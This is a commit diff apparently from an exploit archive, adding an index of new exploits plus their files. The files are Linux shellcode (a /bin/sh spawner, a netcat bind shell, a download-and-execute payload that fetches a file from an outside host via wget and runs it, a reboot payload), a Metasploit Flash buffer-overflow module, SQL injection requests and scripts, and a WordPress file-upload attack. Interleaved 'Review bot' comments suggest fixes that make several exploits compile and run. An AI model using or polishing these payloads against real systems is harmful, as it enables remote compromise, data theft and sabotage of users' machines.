DB: 2015-06-25

22 new exploits
Offensive Security 2015-06-25 05:03:16 +00:00
parent 15dae7c288
commit 611a35761a
23 changed files with 1491 additions and 1 deletions


@ -33375,7 +33375,7 @@ id,file,description,date,author,platform,type,port
36980,platforms/windows/local/36980.py,"VideoCharge Express 3.16.3.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36981,platforms/windows/local/36981.py,"VideoCharge Professional + Express Vanilla 3.18.4.04 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
36982,platforms/windows/local/36982.py,"VideoCharge Vanilla 3.16.4.06 - BOF Exploit",2015-05-11,evil_comrade,windows,local,0
37186,platforms/php/webapps/37186.txt,"vfront-0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
37186,platforms/php/webapps/37186.txt,"VFront 0.99.2 CSRF & Persistent XSS",2015-06-03,"John Page",php,webapps,0
36984,platforms/windows/remote/36984.py,"i.FTP 2.21 - Time Field SEH Exploit",2015-05-11,"Revin Hadi Saputra",windows,remote,0
37006,platforms/java/webapps/37006.txt,"Minify 2.1.x 'g' Parameter Cross Site Scripting Vulnerability",2012-03-21,"Ayoub Aboukir",java,webapps,0
36986,platforms/php/webapps/36986.txt,"Pluck 4.7 - Directory Traversal",2015-05-11,"Wad Deek",php,webapps,0
@ -33612,6 +33612,10 @@ id,file,description,date,author,platform,type,port
37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37350,platforms/php/webapps/37350.txt,"AdaptCMS 2.0.2 TinyURL Plugin index.php id Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0
37351,platforms/php/webapps/37351.txt,"AdaptCMS 2.0.2 TinyURL Plugin admin.php Multiple Parameter SQL Injection",2012-06-03,KedAns-Dz,php,webapps,0
37352,platforms/php/webapps/37352.txt,"Ignite Solutions CMS 'car-details.php' SQL Injection Vulnerability",2012-06-03,Am!r,php,webapps,0
37353,platforms/php/webapps/37353.php,"Nmedia WordPress Member Conversation Plugin 1.35.0 'doupload.php' Arbitrary File Upload Vulnerability",2015-06-05,"Sammy FORGIT",php,webapps,0
37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script 1.0 - (Time Based) SQLi",2015-06-09,Pancaker,php,webapps,0
37251,platforms/lin_x86/shellcode/37251.asm,"Linux/x86 - execve /bin/sh shellcode (21 bytes)",2015-06-10,B3mB4m,lin_x86,shellcode,0
37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
@ -33670,6 +33674,7 @@ id,file,description,date,author,platform,type,port
37285,platforms/lin_x86/shellcode/37285.txt,"Linux/x86 - chmod() 777 /etc/shadow & exit() (33 bytes)",2015-06-15,B3mB4m,lin_x86,shellcode,0
37286,platforms/windows/dos/37286.py,"Filezilla 3.11.0.2 - SFTP Module Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
37287,platforms/windows/dos/37287.html,"Cisco AnyConnect Secure Mobility 2.x_ 3.x_ 4.x - Client DoS PoC",2015-06-15,LiquidWorm,windows,dos,0
37354,platforms/php/webapps/37354.py,"Bigware Shop 2.1x 'main_bigware_54.php' SQL Injection Vulnerability",2012-06-05,rwenzel,php,webapps,0
37289,platforms/lin_x86/shellcode/37289.txt,"Linux/x86 - execve /bin/sh shellcode (21 bytes) (2)",2015-06-15,B3mB4m,lin_x86,shellcode,0
37290,platforms/php/webapps/37290.txt,"Milw0rm Clone Script 1.0 - (Auth Bypass) SQL Injection Vulnerability",2015-06-15,"walid naceri",php,webapps,0
37291,platforms/windows/dos/37291.py,"Putty 0.64 - Denial of Service Vulnerability",2015-06-15,3unnym00n,windows,dos,0
@ -33691,13 +33696,30 @@ id,file,description,date,author,platform,type,port
37326,platforms/windows/dos/37326.py,"WinylPlayer 3.0.3 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
37327,platforms/windows/dos/37327.py,"HansoPlayer 3.4.0 Memory Corruption PoC",2015-06-19,"Rajganesh Pandurangan",windows,dos,0
37328,platforms/php/webapps/37328.php,"Small-Cms 'hostname' Parameter Remote PHP Code Injection Vulnerability",2012-05-26,L3b-r1'z,php,webapps,0
37358,platforms/lin_x86/shellcode/37358.c,"Linux/x86 - mkdir HACK & chmod 777 and exit(0) - 29 Bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0
37359,platforms/lin_x86/shellcode/37359.c,"Linux/x86 - Netcat BindShell Port 5555 - 60 bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0
37355,platforms/php/webapps/37355.txt,"MyBB 1.6.8 'member.php' SQL Injection Vulnerability",2012-06-06,MR.XpR,php,webapps,0
37356,platforms/php/webapps/37356.txt,"WordPress Email Newsletter Plugin 8.0 'option' Parameter Information Disclosure Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
37357,platforms/php/webapps/37357.php,"WordPress VideoWhisper Video Presentation Plugin 3.17 'vw_upload.php' Arbitrary File Upload Vulnerability",2012-06-07,"Sammy FORGIT",php,webapps,0
37337,platforms/php/webapps/37337.txt,"WHMCompleteSolution (WHMCS) 5.0 Multiple Application Function CSRF",2012-05-31,"Shadman Tanjim",php,webapps,0
37338,platforms/php/webapps/37338.txt,"WHMCompleteSolution (WHMCS) 5.0 knowledgebase.php search Parameter XSS",2012-05-31,"Shadman Tanjim",php,webapps,0
37339,platforms/php/webapps/37339.txt,"VoipNow Professional 2.5.3 'nsextt' Parameter Cross Site Scripting Vulnerability",2012-06-01,Aboud-el,php,webapps,0
37340,platforms/php/webapps/37340.html,"TinyCMS 1.3 File Upload CSRF",2012-06-03,KedAns-Dz,php,webapps,0
37341,platforms/php/webapps/37341.txt,"TinyCMS 1.3 index.php page Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37342,platforms/php/webapps/37342.txt,"TinyCMS 1.3 admin/admin.php do Parameter Traversal Local File Inclusion",2012-06-03,KedAns-Dz,php,webapps,0
37343,platforms/windows/dos/37343.py,"Seagate Dashboard 4.0.21.0 - Crash PoC",2015-06-23,HexTitan,windows,dos,0
37344,platforms/windows/local/37344.py,"KMPlayer 3.9.1.136 - Capture Unicode Buffer Overflow (ASLR Bypass)",2015-06-23,"Naser Farhadi",windows,local,0
37360,platforms/php/webapps/37360.txt,"GeniXCMS 0.0.3 - XSS Vulnerabilities",2015-06-24,"John Page",php,webapps,80
37346,platforms/windows/dos/37346.txt,"Paintshop Pro X7 GIF Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize)",2015-06-23,"Francis Provencher",windows,dos,0
37347,platforms/windows/dos/37347.txt,"Photoshop CC2014 and Bridge CC 2014 Gif Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37348,platforms/windows/dos/37348.txt,"Photoshop CC2014 and Bridge CC 2014 PNG Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37349,platforms/windows/dos/37349.txt,"Photoshop CC2014 and Bridge CC 2014 PDF Parsing Memory Corruption Vulnerabilities",2015-06-23,"Francis Provencher",windows,dos,0
37361,platforms/php/webapps/37361.txt,"WordPress Huge-IT Slider 2.7.5 - Multiple Vulnerabilities",2015-06-24,"i0akiN SEC-LABORATORY",php,webapps,0
37362,platforms/lin_x86-64/shellcode/37362.c,"linux/x86-64 execve(/bin/sh) 30 bytes",2015-06-24,"Bill Borskey",lin_x86-64,shellcode,0
37363,platforms/php/webapps/37363.txt,"GeniXCMS 0.0.3 - register.php SQL Injection Vulnerabilities",2015-06-24,cfreer,php,webapps,80
37364,platforms/php/webapps/37364.txt,"Joomla SimpleImageUpload - Arbitrary File Upload",2015-06-24,CrashBandicot,php,webapps,80
37365,platforms/lin_x86/shellcode/37365.c,"Linux/x86 Downloand & Execute",2015-06-24,B3mB4m,lin_x86,shellcode,0
37366,platforms/lin_x86/shellcode/37366.c,"Linux/x86 Reboot - 28 Bytes",2015-06-24,B3mB4m,lin_x86,shellcode,0
37367,platforms/windows/local/37367.rb,"Windows ClientCopyImage Win32k Exploit",2015-06-24,metasploit,windows,local,0
37368,platforms/multiple/remote/37368.rb,"Adobe Flash Player ShaderJob Buffer Overflow",2015-06-24,metasploit,multiple,remote,0
37369,platforms/php/webapps/37369.txt,"Vesta Control Panel 0.9.8 - OS Command Injection",2015-06-24,"High-Tech Bridge SA",php,webapps,0



@ -0,0 +1,33 @@
/*
William Borskey 2015
Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm.
1 ; int execve(const char *filename, char *const argv[], char *const envp[]);
2 BITS 64
3
4 section .text
5 global start
6
7 start:
8 mov rcx, 0x1168732f6e69622f ;move the immediate value /bin/sh in hex in
9 ;little endian byte order into rcx padded with 11
10 shl rcx, 0x08 ;left shift to trim off the two bytes of padding
11 shr rcx, 0x08 ;ringht shift to re order string
12 push rcx ;push the immediate value stored in rcx onto the stack
13 lea rdi, [rsp] ;load the address of the string that is on the stack into rsi
14 xor rdx, rdx ;zero out rdx for an execve argument
15 mov al, 0x3b ;move 0x3b (execve sycall) into al to avoid nulls
16 syscall ;make the syscall
*/
char shellcode[] = "\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05";
int main(int argc, char **argv)
{
int (*func)();
func = (int (*)()) shellcode;
(int)(*func)();
return 0;
}
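Review bot: The comment on `lea rdi, [rsp]` says the address is loaded "into rsi", but the instruction writes rdi (execve's first argument); it should read `;load the address of the string on the stack into rdi`. The padding note is also off: 0x11 is a single byte, and the `shl`/`shr` by 8 strips exactly one byte, so "trim off the two bytes of padding" should be "trim off the one byte of padding" (and "ringht" is "right"). In the harness, `(int)(*func)();` casts a value that is immediately discarded and `int (*func)();` is an old-style declaration with no prototype; `void (*func)(void) = (void (*)(void)) shellcode;` followed by `func();` says the same thing without the dead cast.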


@ -0,0 +1,42 @@
#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Auxiliary tools (50% time gain !)
#https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
#https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/ASMtoShellcode.py
Disassembly of section .text:
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 48 41 43 4b push $0x4b434148 #You can change it !
8048068: b0 27 mov $0x27,%al
804806a: 89 e3 mov %esp,%ebx
804806c: 66 41 inc %cx
804806e: cd 80 int $0x80
8048070: b0 0f mov $0xf,%al
8048072: 66 b9 ff 01 mov $0x1ff,%cx
8048076: cd 80 int $0x80
8048078: 31 c0 xor %eax,%eax
804807a: 40 inc %eax
804807b: cd 80 int $0x80
#include <stdio.h>
#include <string.h>
char *shellcode =
"\x31\xc0\x50\x68\x48\x41\x43\x4b\xb0\x27\x89\xe3\x66\x41\xcd\x80\xb0\x0f\x66\xb9\xff\x01\xcd\x80\x31\xc0\x40\xcd\x80";
//First push always start with byte 68.Also mov b0.
//Than just push your string between byte 68 - b0 ! :)
//Here it is -> \x68 "\x48\x41\x43\x4b\" xb0 GOODLUCK !
int main(void){
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();}
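Review bot: The file is not valid C as committed: the `#Greetz`/`#Author` lines and the objdump listing above `#include <stdio.h>` sit outside any comment, so the preprocessor rejects `#Greetz` as an unknown directive before the harness is ever reached; wrapping that preamble in `/* ... */`, as 37362.c does, would make the file compile as shipped. The same unwrapped preamble is in 37359.c and 37366.c, and the Python section of 37365 is likewise preceded by prose and a listing that are not commented out. Separately, `"Length: %d\n"` is paired with `strlen`, which returns size_t; the matching conversion is `fprintf(stdout,"Length: %zu\n",strlen(shellcode));` (same line in 37359.c and 37366.c).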


@ -0,0 +1,54 @@
#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Concat : Do not disturb - Bomberman
#Netcat openbsd version (which is default installed in ubuntu) have
not "-e" option.
#So if you are trying to test on ubuntu(like me) you must change
version to traditional.
#Typing this:
#1) sudo update-alternatives --config nc
#2) Select the option /bin/nc.traditional
Disassembly of section .text:
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 6e 2f 6e 63 push $0x636e2f6e
8048068: 68 2f 2f 62 69 push $0x69622f2f
804806d: 89 e3 mov %esp,%ebx
804806f: 50 push %eax
8048070: 68 35 35 35 35 push $0x35353535 #PORT
8048075: 68 2d 6c 74 70 push $0x70746c2d
804807a: 89 e1 mov %esp,%ecx
804807c: 50 push %eax
804807d: 68 2f 2f 73 68 push $0x68732f2f
8048082: 68 2f 62 69 6e push $0x6e69622f
8048087: 68 2d 65 2f 2f push $0x2f2f652d
804808c: 89 e2 mov %esp,%edx
804808e: 50 push %eax
804808f: 52 push %edx
8048090: 51 push %ecx
8048091: 53 push %ebx
8048092: 89 e7 mov %esp,%edi
8048094: b0 0b mov $0xb,%al
8048096: 89 f9 mov %edi,%ecx
8048098: 31 d2 xor %edx,%edx
804809a: cd 80 int $0x80
#include <stdio.h>
#include <string.h>
char *loveme = "\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x35\x35\x35"
"\x35\x68\x2d\x6c\x74\x70\x89\xe1\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68"
"\x2d\x65\x2f\x2f\x89\xe2\x50\x52\x51\x53\x89\xe7\xb0\x0b\x89\xf9\x31\xd2\xcd\x80";
// "\x68-----\x35\x35\x35\x35\-------x68\" There port change however you like.
int main(void){
fprintf(stdout,"Length: %d\n",strlen(loveme));
(*(void(*)()) loveme)();}


@ -0,0 +1,129 @@
Linux/x86 Downloand&Execute
------WE ARE BOMBERMANS----
#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Just the two of us LOL.
Info!
This shellcode has two part.Because when using fork in asm, ocurrs problems in shellcode.
So you can use multiprocessing to do this.
If you dont want problem while running shellcodes.
I did not calculate len bytes.Because its completely depend url length.
TESTED ON : Ubuntu 14.04
/*
The NX Bit prevents random data being executed on modern processors and OSs.
To get around it, call mprotect.
You should also define your shellcode as a binary instead of a character string.
-By Philipp Hagemeister
Emmy goes to Philipp Hagemeister ! ! (clap clap clap clap)
Special thanks :) ..
*/
;https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
;Use it convert string to stack.
#Remote file download#
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 68 65 6c 6c push $0x6c6c6568
8048068: 68 62 34 6d 2f push $0x2f6d3462
804806d: 68 2f 62 33 6d push $0x6d33622f
8048072: 68 6d 2f 2f 2f push $0x2f2f2f6d
8048077: 68 73 2e 63 6f push $0x6f632e73
804807c: 68 78 69 6d 61 push $0x616d6978
8048081: 68 33 2e 6d 65 push $0x656d2e33 ;3.meximas.com/b3mb4m/hell
8048086: 89 e1 mov %esp,%ecx
8048088: 50 push %eax
8048089: 68 77 67 65 74 push $0x74656777
804808e: 68 62 69 6e 2f push $0x2f6e6962
8048093: 68 75 73 72 2f push $0x2f727375
8048098: 68 2f 2f 2f 2f push $0x2f2f2f2f
804809d: 89 e3 mov %esp,%ebx
804809f: 50 push %eax
80480a0: 50 push %eax
80480a1: 51 push %ecx
80480a2: 53 push %ebx
80480a3: 89 e1 mov %esp,%ecx
80480a5: b0 0b mov $0xb,%al
80480a7: cd 80 int $0x80
80480a9: 31 c0 xor %eax,%eax
80480ab: fe c0 inc %al
80480ad: cd 80 int $0x80
#Download&Chmod777&Execute
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 31 c9 xor %ecx,%ecx
8048064: 50 push %eax
8048065: 68 68 65 6c 6c push $0x6c6c6568 ;file name(hell)
804806a: b0 0f mov $0xf,%al
804806c: 89 e3 mov %esp,%ebx
804806e: 66 b9 ff 01 mov $0x1ff,%cx
8048072: cd 80 int $0x80
8048074: 31 c0 xor %eax,%eax
8048076: 50 push %eax
8048077: 89 e2 mov %esp,%edx
8048079: 53 push %ebx
804807a: 89 e1 mov %esp,%ecx
804807c: b0 0b mov $0xb,%al
804807e: cd 80 int $0x80
Than lets back python.
#!/usr/bin/python
import ctypes
import multiprocessing
import time
def download(firstone="Capture"):
if firstone != "Capture":
#Download codes.
shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\x68\x62\x34\x6d\x2f\x68\x2f\x62"
b"\x33\x6d\x68\x6d\x2f\x2f\x2f\x68\x73\x2e\x63\x6f\x68\x78\x69\x6d\x61\x68\x33\x2e"
b"\x6d\x65\x89\xe1\x50\x68\x77\x67\x65\x74\x68\x62\x69\x6e\x2f\x68\x75\x73\x72\x2f"
b"\x68\x2f\x2f\x2f\x2f\x89\xe3\x50\x50\x51\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\xfe"
b"\xc0\xcd\x80")
else:
time.sleep(30)#Time delay, depend ur file size.
shellcode_data = (b"\x31\xc0\x50\x68\x68\x65\x6c\x6c\xb0\x0f\x89\xe3\x66\xb9\xff\x01"
b"\xcd\x80\x31\xc0\x50\x53\x89\xe1\xb0\x0b\xcd\x80")
#Chomd777 and execute it.
shellcode = ctypes.c_char_p(shellcode_data)
function = ctypes.cast(shellcode, ctypes.CFUNCTYPE(None))
addr = ctypes.cast(function, ctypes.c_void_p).value
libc = ctypes.CDLL('libc.so.6')
pagesize = libc.getpagesize()
addr_page = (addr // pagesize) * pagesize
for page_start in range(addr_page, addr + len(shellcode_data), pagesize):
assert libc.mprotect(page_start, pagesize, 0x7) == 0
function()
for x in xrange(0, 2):
if x == 0:
first = multiprocessing.Process(target=download, args=("KnockKnock",))
else:
first = multiprocessing.Process(target=download)
first.start()
#Bomberman Team presented !!
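Review bot: The index side of this commit records this file as `platforms/lin_x86/shellcode/37365.c`, yet the runnable part is the Python script starting at `#!/usr/bin/python`, and the disassembly listing above it is not commented out, so neither a C compiler nor a Python interpreter accepts the file as committed; the extension and the preamble need reconciling. `xrange` pins the script to Python 2 while the `b"..."` literals and `//` division also run on 3, so either use `range` or make the shebang `#!/usr/bin/python2`. `assert libc.mprotect(page_start, pagesize, 0x7) == 0` is stripped under `-O`, so a failed protection change should be reported explicitly, e.g. `if libc.mprotect(page_start, pagesize, 0x7) != 0: raise OSError('mprotect failed')`. The `firstone="Capture"` / `"KnockKnock"` sentinel also reads backwards (the default argument selects the branch that sleeps and executes); a boolean keyword such as `def download(fetch=False)` would make the two process roles obvious.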


@ -0,0 +1,34 @@
Linux/x86 Reboot - 28Bytes
#Greetz : Bomberman(Leader)
#Author : B3mB4m
#Tested ON : Ubuntu 14.04
08048060 <.text>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 62 6f 6f 74 push $0x746f6f62
8048068: 68 6e 2f 72 65 push $0x65722f6e
804806d: 68 2f 73 62 69 push $0x6962732f
8048072: 89 e3 mov %esp,%ebx
8048074: 50 push %eax
8048075: 53 push %ebx
8048076: 89 e1 mov %esp,%ecx
8048078: b0 0b mov $0xb,%al
804807a: cd 80 int $0x80
#include <stdio.h>
#include <string.h>
char *shellcode = "\x31\xc0\x50\x68\x62\x6f\x6f\x74\x68\x6e\x2f\x72\x65"
"\x68\x2f\x73\x62\x69\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
int main(void){
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
}


@ -0,0 +1,150 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ShaderJob Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
of the ShaderJob after starting the job it's possible to create a buffer overflow condition
where the size of the destination buffer and the length of the copy are controlled. This
module has been tested successfully on:
* Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
* Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
* Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
* Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Chris Evans', # Vulnerability discovery
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3090'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end
false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
end
false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'May 12 2015',
'DefaultTarget' => 0))
end
def exploit
@swf = create_swf
super
end
def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")
if request.uri =~ /\.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end
print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end
def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]
if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end
html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|
return html_template, binding()
end
def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }
swf
end
end
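Review bot: In `create_swf` the value is assigned twice, `swf = ::File.open(path, 'rb') { |f| swf = f.read }`, when the block's return value is already what the outer assignment captures; `::File.binread(path)` does the same read and close in one call, so the method body can be just `path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')` followed by `::File.binread(path)`. In `exploit_template`, `platform_id` is only set inside the `if`/`elsif` chain, so it would be nil for any target name matching neither branch; the Targets table already declares `'Platform' => 'win'` / `'linux'`, so reading that from the selected target (e.g. `target['Platform']`, if the target accessor exposes it) removes both the duplicated regex and the nil case. `return html_template, binding()` also uses empty parens on `binding`; the bare `binding` is the convention.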


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53764/info
AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?view=plugins&plugin=tinyurl&module=go&id='1337 AND 2=1 UNION SELECT 1,2,3,4,5--


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53764/info
AdaptCMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
AdaptCMS 2.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/admin.php?view=plugins&do=load&plugin=tinyurl&module=delete&id=[ + SQL Injection Code + ]


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/53771/info
Ignite Solutions CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/car-details.php?ID=[Sql]

31
platforms/php/webapps/37353.php Executable file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/53790/info
The Nmedia WordPress Member Conversation plug-in for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary PHP code and run it in the context of the Web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Nmedia WordPress Member Conversation 1.35.0 is vulnerable; other versions may also be affected.
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.exemple.com/wordpress/wp-content/plugins/wordpress-member-private-conversation/doupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>"/test/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.exemple.com/wordpress/wp-content/uploads/user_uploads/test/lo.php
lo.php
<?php
phpinfo();
?>
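Review bot: The placeholder host in `curl_init("http://www.exemple.com/...")` and in the `Shell Access :` URL is `exemple.com`, not the RFC 2606-reserved `example.com` that the other advisories in this commit use; `exemple.com` is an ordinary registrable domain, so running the script unedited sends the upload to whoever holds it. The two lines should read `curl_init("http://www.example.com/wordpress/wp-content/plugins/wordpress-member-private-conversation/doupload.php");` and `http://www.example.com/wordpress/wp-content/uploads/user_uploads/test/lo.php`. `print "$postResult";` also interpolates a lone variable for no effect; `print $postResult;` is equivalent.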

31
platforms/php/webapps/37354.py Executable file

@ -0,0 +1,31 @@
source: http://www.securityfocus.com/bid/53810/info
Bigware Shop is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Bigware Shop versions prior to 2.17 are vulnerable.
#!/usr/bin/python
# -*- coding: utf-8 -*-
import httplib2
import urllib
import sys
# insert your target link here (with trailing slash)
url = "http://www.example.com/"
h = httplib2.Http()
# send sql injection
headerdata = {'Content-type': 'application/x-www-form-urlencoded'}
sqli = '2 AND (SELECT 1 FROM(SELECT COUNT(*), CONCAT((SELECT former_email_address FROM former where former_groups_id like 1 LIMIT 0,1), CHAR(58), (SELECT
former_password FROM former where former_groups_id like 1 LIMIT 0,1),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)'
postdata = { 'voteid' : '2', \
'pollid' : sqli, \
'x' : '1', \
'y' : '1', \
'forwarder' : 'http%3a%2f%2fdemoshop.bigware.org%2fmain_bigware_53.php%3fop%3dresults%26pollid%3d2'}
response, content = h.request(url + "main_bigware_54.php", "POST", headers=headerdata, body=urllib.urlencode(postdata))
print content, "\n", "\n"
print "If there is an error stating the duplicate admin entry, your shop is vulnerable."
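Review bot: The `sqli` literal appears to break across two lines inside a single-quoted string (the line ending in `(SELECT` and the next starting with `former_password`); if that is the committed content rather than a rendering wrap, it is a SyntaxError, and the safe form is two adjacent literals inside parentheses. The `print content, "\n", "\n"` statements and `urllib.urlencode` are Python 2-only and `httplib2` is a third-party package, none of which the header records; `#!/usr/bin/python2` plus a `# requires: httplib2` comment next to the import would pin that. The `forwarder` value is already percent-encoded and is then passed through `urllib.urlencode`, so it goes out double-encoded; give it the plain URL and let `urlencode` do the escaping once.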


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53814/info
MyBB is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
MyBB 1.6.8 is vulnerable; other versions may also be affected.
